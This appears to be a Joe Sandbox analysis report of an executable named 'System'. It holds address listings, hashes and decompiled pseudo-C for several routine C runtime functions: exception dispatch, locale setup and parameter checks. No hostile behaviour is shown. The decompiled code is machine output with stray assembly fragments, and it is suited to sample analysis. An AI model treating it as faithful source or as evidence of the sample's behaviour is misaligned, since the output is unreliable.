                                                                                                                                                              0x7ff6e4c7b31e
                                                                                                                                                              0x7ff6e4c7b327
                                                                                                                                                              0x7ff6e4c7b331
                                                                                                                                                              0x7ff6e4c7b334
                                                                                                                                                              0x7ff6e4c7b33a
                                                                                                                                                              0x7ff6e4c7b343
                                                                                                                                                              0x7ff6e4c7b34c
                                                                                                                                                              0x7ff6e4c7b351
                                                                                                                                                              0x7ff6e4c7b356
                                                                                                                                                              0x7ff6e4c7b358
                                                                                                                                                              0x7ff6e4c7b35b
                                                                                                                                                              0x7ff6e4c7b360
                                                                                                                                                              0x7ff6e4c7b369
                                                                                                                                                              0x7ff6e4c7b36f
                                                                                                                                                              0x7ff6e4c7b372
                                                                                                                                                              0x7ff6e4c7b374
                                                                                                                                                              0x7ff6e4c7b378
                                                                                                                                                              0x7ff6e4c7b381
                                                                                                                                                              0x7ff6e4c7b38a
                                                                                                                                                              0x7ff6e4c7b38f
                                                                                                                                                              0x7ff6e4c7b392
                                                                                                                                                              0x7ff6e4c7b39a
                                                                                                                                                              0x7ff6e4c7b3a2
                                                                                                                                                              0x7ff6e4c7b3a8
                                                                                                                                                              0x7ff6e4c7b3b3
                                                                                                                                                              0x7ff6e4c7b3be
                                                                                                                                                              0x7ff6e4c7b3c1
                                                                                                                                                              0x7ff6e4c7b3c6
                                                                                                                                                              0x7ff6e4c7b3c9
                                                                                                                                                              0x7ff6e4c7b3cf
                                                                                                                                                              0x7ff6e4c7b3d2
                                                                                                                                                              0x7ff6e4c7b3d8
                                                                                                                                                              0x7ff6e4c7b3e0
                                                                                                                                                              0x7ff6e4c7b3e5
                                                                                                                                                              0x7ff6e4c7b3ea
                                                                                                                                                              0x7ff6e4c7b3ef
                                                                                                                                                              0x7ff6e4c7b3f4
                                                                                                                                                              0x7ff6e4c7b3f6
                                                                                                                                                              0x7ff6e4c7b3f9
                                                                                                                                                              0x7ff6e4c7b401
                                                                                                                                                              0x7ff6e4c7b405
                                                                                                                                                              0x7ff6e4c7b407
                                                                                                                                                              0x7ff6e4c7b40b
                                                                                                                                                              0x7ff6e4c7b414
                                                                                                                                                              0x7ff6e4c7b416
                                                                                                                                                              0x7ff6e4c7b41a
                                                                                                                                                              0x7ff6e4c7b41f
                                                                                                                                                              0x7ff6e4c7b421
                                                                                                                                                              0x7ff6e4c7b426
                                                                                                                                                              0x7ff6e4c7b42b
                                                                                                                                                              0x7ff6e4c7b42d
                                                                                                                                                              0x7ff6e4c7b432
                                                                                                                                                              0x7ff6e4c7b438
                                                                                                                                                              0x7ff6e4c7b43c
                                                                                                                                                              0x7ff6e4c7b441
                                                                                                                                                              0x7ff6e4c7b443
                                                                                                                                                              0x7ff6e4c7b447
                                                                                                                                                              0x7ff6e4c7b44b
                                                                                                                                                              0x7ff6e4c7b44f
                                                                                                                                                              0x7ff6e4c7b453
                                                                                                                                                              0x7ff6e4c7b455
                                                                                                                                                              0x7ff6e4c7b464
                                                                                                                                                              0x7ff6e4c7b469
                                                                                                                                                              0x7ff6e4c7b476
                                                                                                                                                              0x7ff6e4c7b47a
                                                                                                                                                              0x7ff6e4c7b47c
                                                                                                                                                              0x7ff6e4c7b482
                                                                                                                                                              0x7ff6e4c7b487
                                                                                                                                                              0x7ff6e4c7b48c
                                                                                                                                                              0x7ff6e4c7b492
                                                                                                                                                              0x7ff6e4c7b496
                                                                                                                                                              0x7ff6e4c7b49b
                                                                                                                                                              0x7ff6e4c7b4a8
                                                                                                                                                              0x7ff6e4c7b4ab
                                                                                                                                                              0x7ff6e4c7b4b2
                                                                                                                                                              0x7ff6e4c7b4bc
                                                                                                                                                              0x7ff6e4c7b4be
                                                                                                                                                              0x7ff6e4c7b4c1
                                                                                                                                                              0x7ff6e4c7b4c5
                                                                                                                                                              0x7ff6e4c7b4c9
                                                                                                                                                              0x7ff6e4c7b4cb
                                                                                                                                                              0x7ff6e4c7b4d1
                                                                                                                                                              0x7ff6e4c7b4dc
                                                                                                                                                              0x7ff6e4c7b4de
                                                                                                                                                              0x7ff6e4c7b4e2
                                                                                                                                                              0x7ff6e4c7b4e5
                                                                                                                                                              0x7ff6e4c7b4ec
                                                                                                                                                              0x7ff6e4c7b4ee
                                                                                                                                                              0x7ff6e4c7b4f2
                                                                                                                                                              0x7ff6e4c7b4fd
                                                                                                                                                              0x7ff6e4c7b4ff
                                                                                                                                                              0x7ff6e4c7b506
                                                                                                                                                              0x7ff6e4c7b50d
                                                                                                                                                              0x7ff6e4c7b50f
                                                                                                                                                              0x7ff6e4c7b513
                                                                                                                                                              0x7ff6e4c7b51e
                                                                                                                                                              0x7ff6e4c7b51f
                                                                                                                                                              0x7ff6e4c7b521
                                                                                                                                                              0x7ff6e4c7b527
                                                                                                                                                              0x7ff6e4c7b52e
                                                                                                                                                              0x7ff6e4c7b530
                                                                                                                                                              0x7ff6e4c7b538
                                                                                                                                                              0x7ff6e4c7b541
                                                                                                                                                              0x7ff6e4c7b545
                                                                                                                                                              0x7ff6e4c7b54a
                                                                                                                                                              0x7ff6e4c7b54f
                                                                                                                                                              0x7ff6e4c7b56c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                              • Opcode ID: 851a857f57f4765cc1557b6bb8635308908a727c27b3e85f1c3da4bb1f5f10ca
                                                                                                                                                              • Instruction ID: 5da0bf18f840cfe5b9597280a3d831e8ee4d421466ac8ec92c03c6413ebe2ad3
                                                                                                                                                              • Opcode Fuzzy Hash: 851a857f57f4765cc1557b6bb8635308908a727c27b3e85f1c3da4bb1f5f10ca
                                                                                                                                                              • Instruction Fuzzy Hash: E1814C2B9CC65386F6A54A39C6D83782AB09F11F4CF549036CB09C76D5EE2FA841960B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C66598 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E00007FF67FF6E4C66598(void* __edx, long long* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t94;
				intOrPtr _t101;
				void* _t103;
				void* _t117;
				long long _t118;
				signed long long _t124;
				long long _t126;
				signed long long _t127;
				signed long long _t169;
				long long _t172;
				signed char* _t183;
				signed char* _t184;
				signed char* _t185;
				void* _t186;
				long long* _t187;
				long long* _t188;
				void* _t189;
				signed long long _t190;
				intOrPtr _t198;
				void* _t205;
				long long _t206;

				_t188 = _t189 - 0x38;
				_t190 = _t189 - 0x138;
				_t124 =  *0xe4ca90a0; // 0x1ae1b17e2973
				 *(_t188 + 0x28) = _t124 ^ _t190;
				_t186 = __r9;
				_t126 =  *((intOrPtr*)(_t188 + 0xb8));
				_t205 = __rdx;
				_t206 =  *((intOrPtr*)(_t188 + 0xa0));
				_t187 = __rcx;
				 *((long long*)(_t190 + 0x70)) = _t126;
				 *((long long*)(_t190 + 0x78)) = __r8;
				if ( *__rcx == 0x80000003) goto 0xe4c66861;
				E00007FF67FF6E4C64EF8(_t126);
				r12d =  *((intOrPtr*)(_t188 + 0xb0));
				r15d =  *((intOrPtr*)(_t188 + 0xa8));
				if ( *((long long*)(_t126 + 0x10)) == 0) goto 0xe4c66660;
				__imp__EncodePointer();
				E00007FF67FF6E4C64EF8(_t126);
				if ( *((intOrPtr*)(_t126 + 0x10)) == _t126) goto 0xe4c66660;
				if ( *__rcx == 0xe0434f4d) goto 0xe4c66660;
				if ( *__rcx == 0xe0434352) goto 0xe4c66660;
				_t127 =  *((intOrPtr*)(_t190 + 0x70));
				 *((intOrPtr*)(_t190 + 0x38)) = r15d;
				 *(_t190 + 0x30) = _t127;
				 *((intOrPtr*)(_t190 + 0x28)) = r12d;
				 *((long long*)(_t190 + 0x20)) = _t206;
				E00007FF67FF6E4C63344(__rcx, __rdx,  *((intOrPtr*)(_t190 + 0x78)), __r9);
				if (_t127 != 0) goto 0xe4c66861;
				E00007FF67FF6E4C67054(_t188, _t206,  *((intOrPtr*)(__r9 + 8)));
				if ( *_t188 <= 0) goto 0xe4c66881;
				 *((intOrPtr*)(_t190 + 0x28)) = r12d;
				 *((long long*)(_t190 + 0x20)) = _t206;
				r8d = r15d;
				_t94 = E00007FF67FF6E4C6380C(_t126, _t188 - 0x70, _t188, _t186, __rcx, _t188);
				asm("movups xmm0, [ebp-0x70]");
				asm("movdqu [ebp-0x80], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t127 -  *((intOrPtr*)(_t188 - 0x58)) >= 0) goto 0xe4c66861;
				 *((long long*)(_t190 + 0x68)) =  *((intOrPtr*)(_t188 - 0x70));
				 *((long long*)(_t190 + 0x60)) =  *((intOrPtr*)(_t188 - 0x78));
				asm("inc ecx");
				asm("dec ax");
				asm("movups [ebp-0x80], xmm0");
				if (_t94 - r15d > 0) goto 0xe4c667c7;
				_t117 = r15d - _t94;
				if (_t117 > 0) goto 0xe4c667c7;
				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x10))));
				E00007FF67FF6E4C66FD8( *((intOrPtr*)(_t186 + 0x10)), _t188 - 0x50, _t188 - 0x80,  *((intOrPtr*)(_t186 + 8)));
				 *((long long*)(_t188 - 0x48)) =  *((intOrPtr*)(_t188 - 0x40));
				E00007FF67FF6E4C675C4( *((intOrPtr*)(_t188 - 0x40)), _t188 - 0x50);
				_t132 =  *((intOrPtr*)(_t188 - 0x40));
				 *((long long*)(_t188 - 0x48)) =  *((intOrPtr*)(_t188 - 0x40));
				E00007FF67FF6E4C675C4( *((intOrPtr*)(_t188 - 0x40)), _t188 - 0x50);
				if (_t117 == 0) goto 0xe4c6673e;
				E00007FF67FF6E4C675C4( *((intOrPtr*)(_t188 - 0x40)), _t188 - 0x50);
				if (_t117 != 0) goto 0xe4c6672f;
				_t118 =  *((long long*)(_t188 - 0x30));
				if (_t118 == 0) goto 0xe4c6676c;
				E00007FF67FF6E4C63DE8(_t132);
				if (_t118 == 0) goto 0xe4c6676c;
				if ( *((intOrPtr*)(_t188 - 0x30)) == 0) goto 0xe4c66764;
				E00007FF67FF6E4C63DE8(_t132 +  *((intOrPtr*)(_t188 - 0x30)));
				goto 0xe4c66766;
				if ( *0x00000010 != 0) goto 0xe4c667bb;
				if (( *(_t188 - 0x34) & 0x00000040) != 0) goto 0xe4c667bb;
				 *((char*)(_t190 + 0x58)) = 0;
				 *((char*)(_t190 + 0x50)) = 1;
				 *((long long*)(_t190 + 0x48)) =  *((intOrPtr*)(_t190 + 0x70));
				 *((intOrPtr*)(_t190 + 0x40)) = r12d;
				 *((long long*)(_t190 + 0x38)) = _t188 - 0x80;
				 *(_t190 + 0x30) =  *(_t190 + 0x30) & 0x00000000;
				 *((long long*)(_t190 + 0x28)) = _t188 - 0x38;
				 *((long long*)(_t190 + 0x20)) = _t206;
				_t101 = E00007FF67FF6E4C658E8(_t103,  *((intOrPtr*)(_t188 - 0x50)), _t187, _t205,  *((intOrPtr*)(_t190 + 0x78)), _t186);
				_t198 =  *((intOrPtr*)(_t190 + 0x68));
				_t183 =  *(_t198 + 8) -  *((char*)(( *( *(_t198 + 8)) & 0xf) + 0x7ff6e4c92b50));
				 *(_t198 + 8) = _t183;
				 *((intOrPtr*)(_t198 + 0x18)) = _t101;
				_t184 = _t183 -  *((char*)(( *_t183 & 0xf) + 0x7ff6e4c92b50));
				 *(_t198 + 8) = _t184;
				 *((intOrPtr*)(_t198 + 0x1c)) = _t101;
				_t169 =  *_t184 & 0xf;
				_t185 = _t184 -  *((char*)(_t169 + 0x7ff6e4c92b50));
				 *((intOrPtr*)(_t198 + 0x20)) = _t101;
				 *(_t198 + 8) = _t185;
				 *((intOrPtr*)(_t198 + 0x24)) =  *((intOrPtr*)(_t169 + 0x7ff6e4c92b60));
				_t172 =  *((intOrPtr*)(_t190 + 0x60)) + 1;
				 *(_t198 + 8) =  &(_t185[4]);
				 *((long long*)(_t190 + 0x60)) = _t172;
				if (_t172 -  *((intOrPtr*)(_t188 - 0x58)) < 0) goto 0xe4c666c9;
				return E00007FF67FF6E4C623B0(_t101,  *((intOrPtr*)(_t169 + 0x7ff6e4c92b60)),  *(_t188 + 0x28) ^ _t190);
			}




























                                                                                                                                                              0x7ff6e4c665a5
                                                                                                                                                              0x7ff6e4c665aa
                                                                                                                                                              0x7ff6e4c665b1
                                                                                                                                                              0x7ff6e4c665bb
                                                                                                                                                              0x7ff6e4c665c5
                                                                                                                                                              0x7ff6e4c665c8
                                                                                                                                                              0x7ff6e4c665cf
                                                                                                                                                              0x7ff6e4c665d2
                                                                                                                                                              0x7ff6e4c665d9
                                                                                                                                                              0x7ff6e4c665dc
                                                                                                                                                              0x7ff6e4c665e1
                                                                                                                                                              0x7ff6e4c665e6
                                                                                                                                                              0x7ff6e4c665ec
                                                                                                                                                              0x7ff6e4c665f1
                                                                                                                                                              0x7ff6e4c665f8
                                                                                                                                                              0x7ff6e4c66604
                                                                                                                                                              0x7ff6e4c66608
                                                                                                                                                              0x7ff6e4c66611
                                                                                                                                                              0x7ff6e4c6661a
                                                                                                                                                              0x7ff6e4c66622
                                                                                                                                                              0x7ff6e4c6662a
                                                                                                                                                              0x7ff6e4c6662c
                                                                                                                                                              0x7ff6e4c6663c
                                                                                                                                                              0x7ff6e4c66644
                                                                                                                                                              0x7ff6e4c66649
                                                                                                                                                              0x7ff6e4c6664e
                                                                                                                                                              0x7ff6e4c66653
                                                                                                                                                              0x7ff6e4c6665a
                                                                                                                                                              0x7ff6e4c6666b
                                                                                                                                                              0x7ff6e4c66674
                                                                                                                                                              0x7ff6e4c6667a
                                                                                                                                                              0x7ff6e4c66686
                                                                                                                                                              0x7ff6e4c6668b
                                                                                                                                                              0x7ff6e4c66692
                                                                                                                                                              0x7ff6e4c66697
                                                                                                                                                              0x7ff6e4c6669b
                                                                                                                                                              0x7ff6e4c666a0
                                                                                                                                                              0x7ff6e4c666a5
                                                                                                                                                              0x7ff6e4c666ac
                                                                                                                                                              0x7ff6e4c666c0
                                                                                                                                                              0x7ff6e4c666c5
                                                                                                                                                              0x7ff6e4c666c9
                                                                                                                                                              0x7ff6e4c666ce
                                                                                                                                                              0x7ff6e4c666d3
                                                                                                                                                              0x7ff6e4c666da
                                                                                                                                                              0x7ff6e4c666e4
                                                                                                                                                              0x7ff6e4c666e7
                                                                                                                                                              0x7ff6e4c666fd
                                                                                                                                                              0x7ff6e4c66700
                                                                                                                                                              0x7ff6e4c6670d
                                                                                                                                                              0x7ff6e4c66711
                                                                                                                                                              0x7ff6e4c66716
                                                                                                                                                              0x7ff6e4c66721
                                                                                                                                                              0x7ff6e4c66725
                                                                                                                                                              0x7ff6e4c6672d
                                                                                                                                                              0x7ff6e4c66733
                                                                                                                                                              0x7ff6e4c6673c
                                                                                                                                                              0x7ff6e4c6673e
                                                                                                                                                              0x7ff6e4c66742
                                                                                                                                                              0x7ff6e4c66744
                                                                                                                                                              0x7ff6e4c66750
                                                                                                                                                              0x7ff6e4c66754
                                                                                                                                                              0x7ff6e4c66756
                                                                                                                                                              0x7ff6e4c66762
                                                                                                                                                              0x7ff6e4c6676a
                                                                                                                                                              0x7ff6e4c66770
                                                                                                                                                              0x7ff6e4c66782
                                                                                                                                                              0x7ff6e4c6678a
                                                                                                                                                              0x7ff6e4c6678f
                                                                                                                                                              0x7ff6e4c66798
                                                                                                                                                              0x7ff6e4c6679d
                                                                                                                                                              0x7ff6e4c667a6
                                                                                                                                                              0x7ff6e4c667ac
                                                                                                                                                              0x7ff6e4c667b1
                                                                                                                                                              0x7ff6e4c667b6
                                                                                                                                                              0x7ff6e4c667bb
                                                                                                                                                              0x7ff6e4c667e2
                                                                                                                                                              0x7ff6e4c667ea
                                                                                                                                                              0x7ff6e4c667ee
                                                                                                                                                              0x7ff6e4c66809
                                                                                                                                                              0x7ff6e4c66811
                                                                                                                                                              0x7ff6e4c66815
                                                                                                                                                              0x7ff6e4c6681c
                                                                                                                                                              0x7ff6e4c66830
                                                                                                                                                              0x7ff6e4c66838
                                                                                                                                                              0x7ff6e4c66840
                                                                                                                                                              0x7ff6e4c66846
                                                                                                                                                              0x7ff6e4c6684e
                                                                                                                                                              0x7ff6e4c66850
                                                                                                                                                              0x7ff6e4c66854
                                                                                                                                                              0x7ff6e4c6685b
                                                                                                                                                              0x7ff6e4c66880

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                              • Opcode ID: 94176f109b72f81968b62132a9461b648029ba32629ad4b23a1662e638655019
                                                                                                                                                              • Instruction ID: 606822218d8ad56febe5898f833c44e9628ad8ca56c476bc37bbc3b37ebd8fec
                                                                                                                                                              • Opcode Fuzzy Hash: 94176f109b72f81968b62132a9461b648029ba32629ad4b23a1662e638655019
                                                                                                                                                              • Instruction Fuzzy Hash: 9E91BE77A187868AE7108F75E4803AD7BB0FB48F88F10812AEA4D87B55DF39D195C705
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C41BD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 174COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00007FF67FF6E4C41BD0(long long __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				long long _t74;
				intOrPtr _t89;
				void* _t100;
				long long _t104;
				long long* _t107;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t114;
				long long _t116;

				_t74 = __rax;
				 *((long long*)(_t111 + 0x10)) = __rbx;
				 *((long long*)(_t111 + 0x18)) = __rsi;
				_t109 = _t111 - 0x47;
				_t107 = __rcx;
				if (__rcx == 0) goto 0xe4c41d42;
				if ( *__rcx != 0) goto 0xe4c41d42;
				 *((intOrPtr*)(__rax - 0x75)) =  *((intOrPtr*)(__rax - 0x75)) + _t60;
				asm("clc");
				 *((long long*)(_t109 + 0x67)) = __rax;
				_t89 =  *((intOrPtr*)(__rdx + 8));
				if (_t89 == 0) goto 0xe4c41c2c;
				if ( *((intOrPtr*)(_t89 + 0x28)) != 0) goto 0xe4c41c33;
				goto 0xe4c41c33;
				E00007FF67FF6E4C60D0C(_t61, _t109 - 0x59);
				r14d = r14d ^ r14d;
				 *((long long*)(_t109 - 0x51)) = _t116;
				 *((intOrPtr*)(_t109 - 0x49)) = r14b;
				 *((long long*)(_t109 - 0x41)) = _t116;
				 *((intOrPtr*)(_t109 - 0x39)) = r14b;
				 *((long long*)(_t109 - 0x31)) = _t116;
				 *((intOrPtr*)(_t109 - 0x29)) = r14w;
				 *((long long*)(_t109 - 0x21)) = _t116;
				 *((intOrPtr*)(_t109 - 0x19)) = r14w;
				 *((long long*)(_t109 - 0x11)) = _t116;
				 *((intOrPtr*)(_t109 - 9)) = r14b;
				 *((long long*)(_t109 - 1)) = _t116;
				 *((intOrPtr*)(_t109 + 7)) = r14b;
				if (0xe4c9f71b == 0) goto 0xe4c41d5f;
				E00007FF67FF6E4C612B8(_t74, 0xe4c9f71b, _t109 - 0x59, 0xe4c9f71b);
				 *(_t104 + 8) = r14d;
				 *_t104 = 0xe4c92968;
				E00007FF67FF6E4C619B4(0xe4c92968, 0xe4c9f71b, _t109 + 0xf, _t114);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				asm("movsd xmm0, [eax+0x20]");
				asm("movsd [edi+0x30], xmm0");
				 *((long long*)(_t104 + 0x38)) =  *((intOrPtr*)(0x7ff6e4c92990));
				 *_t107 = _t104;
				E00007FF67FF6E4C61324(_t109 - 0x59);
				if ( *((intOrPtr*)(_t109 - 1)) == 0) goto 0xe4c41cda;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t116);
				 *((long long*)(_t109 - 1)) = _t116;
				if ( *((intOrPtr*)(_t109 - 0x11)) == 0) goto 0xe4c41cec;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t104);
				 *((long long*)(_t109 - 0x11)) = _t116;
				if ( *((intOrPtr*)(_t109 - 0x21)) == 0) goto 0xe4c41cfe;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b, _t108);
				 *((long long*)(_t109 - 0x21)) = _t116;
				if ( *((intOrPtr*)(_t109 - 0x31)) == 0) goto 0xe4c41d10;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t109 - 0x31)) = _t116;
				if ( *((intOrPtr*)(_t109 - 0x41)) == 0) goto 0xe4c41d22;
				E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t109 - 0x41)) = _t116;
				if ( *((intOrPtr*)(_t109 - 0x51)) == 0) goto 0xe4c41d34;
				_t58 = E00007FF67FF6E4C69C88(_t60, _t61, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t109 - 0x51)) = _t116;
				_t100 = _t109 - 0x59;
				_t59 = E00007FF67FF6E4C60D84(_t58, _t100);
				asm("rol byte [eax], 0x0");
				 *((intOrPtr*)(_t100 - 0x75)) =  *((intOrPtr*)(_t100 - 0x75)) + _t60;
				_t47 = _t100 - 0x75;
				 *_t47 =  *((intOrPtr*)(_t100 - 0x75)) - _t60;
				if ( *_t47 >= 0) goto 0xe4c41d87;
				return _t59;
			}

















                                                                                                                                                              0x7ff6e4c41bd0
                                                                                                                                                              0x7ff6e4c41bd0
                                                                                                                                                              0x7ff6e4c41bd5
                                                                                                                                                              0x7ff6e4c41bde
                                                                                                                                                              0x7ff6e4c41bed
                                                                                                                                                              0x7ff6e4c41bf3
                                                                                                                                                              0x7ff6e4c41bfd
                                                                                                                                                              0x7ff6e4c41c0c
                                                                                                                                                              0x7ff6e4c41c0f
                                                                                                                                                              0x7ff6e4c41c10
                                                                                                                                                              0x7ff6e4c41c14
                                                                                                                                                              0x7ff6e4c41c1b
                                                                                                                                                              0x7ff6e4c41c24
                                                                                                                                                              0x7ff6e4c41c2a
                                                                                                                                                              0x7ff6e4c41c39
                                                                                                                                                              0x7ff6e4c41c3f
                                                                                                                                                              0x7ff6e4c41c42
                                                                                                                                                              0x7ff6e4c41c46
                                                                                                                                                              0x7ff6e4c41c4a
                                                                                                                                                              0x7ff6e4c41c4e
                                                                                                                                                              0x7ff6e4c41c52
                                                                                                                                                              0x7ff6e4c41c56
                                                                                                                                                              0x7ff6e4c41c5b
                                                                                                                                                              0x7ff6e4c41c5f
                                                                                                                                                              0x7ff6e4c41c64
                                                                                                                                                              0x7ff6e4c41c68
                                                                                                                                                              0x7ff6e4c41c6c
                                                                                                                                                              0x7ff6e4c41c70
                                                                                                                                                              0x7ff6e4c41c77
                                                                                                                                                              0x7ff6e4c41c84
                                                                                                                                                              0x7ff6e4c41c8a
                                                                                                                                                              0x7ff6e4c41c95
                                                                                                                                                              0x7ff6e4c41c9c
                                                                                                                                                              0x7ff6e4c41ca1
                                                                                                                                                              0x7ff6e4c41ca4
                                                                                                                                                              0x7ff6e4c41ca8
                                                                                                                                                              0x7ff6e4c41cac
                                                                                                                                                              0x7ff6e4c41cb0
                                                                                                                                                              0x7ff6e4c41cb5
                                                                                                                                                              0x7ff6e4c41cbd
                                                                                                                                                              0x7ff6e4c41cc0
                                                                                                                                                              0x7ff6e4c41cc7
                                                                                                                                                              0x7ff6e4c41cd3
                                                                                                                                                              0x7ff6e4c41cd5
                                                                                                                                                              0x7ff6e4c41cda
                                                                                                                                                              0x7ff6e4c41ce5
                                                                                                                                                              0x7ff6e4c41ce7
                                                                                                                                                              0x7ff6e4c41cec
                                                                                                                                                              0x7ff6e4c41cf7
                                                                                                                                                              0x7ff6e4c41cf9
                                                                                                                                                              0x7ff6e4c41cfe
                                                                                                                                                              0x7ff6e4c41d09
                                                                                                                                                              0x7ff6e4c41d0b
                                                                                                                                                              0x7ff6e4c41d10
                                                                                                                                                              0x7ff6e4c41d1b
                                                                                                                                                              0x7ff6e4c41d1d
                                                                                                                                                              0x7ff6e4c41d22
                                                                                                                                                              0x7ff6e4c41d2d
                                                                                                                                                              0x7ff6e4c41d2f
                                                                                                                                                              0x7ff6e4c41d34
                                                                                                                                                              0x7ff6e4c41d38
                                                                                                                                                              0x7ff6e4c41d3c
                                                                                                                                                              0x7ff6e4c41d4b
                                                                                                                                                              0x7ff6e4c41d4e
                                                                                                                                                              0x7ff6e4c41d52
                                                                                                                                                              0x7ff6e4c41d52
                                                                                                                                                              0x7ff6e4c41d55
                                                                                                                                                              0x7ff6e4c41d5e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2775327233-1405518554
                                                                                                                                                              • Opcode ID: 2ccf295ba3bb767dfe6de1463cd6aa78e0576e545c2c97ea0776283473993e25
                                                                                                                                                              • Instruction ID: 038a42ef7599b6016e705f21ba1afa77753550dab82903ce4e3005661c25e6f7
                                                                                                                                                              • Opcode Fuzzy Hash: 2ccf295ba3bb767dfe6de1463cd6aa78e0576e545c2c97ea0776283473993e25
                                                                                                                                                              • Instruction Fuzzy Hash: 76717B2BB59B8289EB10CF71D5803BD33B4AF44B94F044536DE8DA7A55CF39E562830A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C6ADD4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00007FF67FF6E4C6ADD4(void* __edi, long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _t71;
				intOrPtr _t76;
				void* _t77;
				char _t79;
				unsigned long long _t87;
				void* _t114;
				unsigned long long _t122;
				intOrPtr _t132;
				signed long long _t134;
				signed long long _t141;
				signed long long _t142;

				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t142 = _t141 | 0xffffffff;
				_t114 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == 0) goto 0xe4c6afd8;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0) goto 0xe4c6ae1a;
				E00007FF67FF6E4C6C854(__rax);
				 *__rax = 0x16;
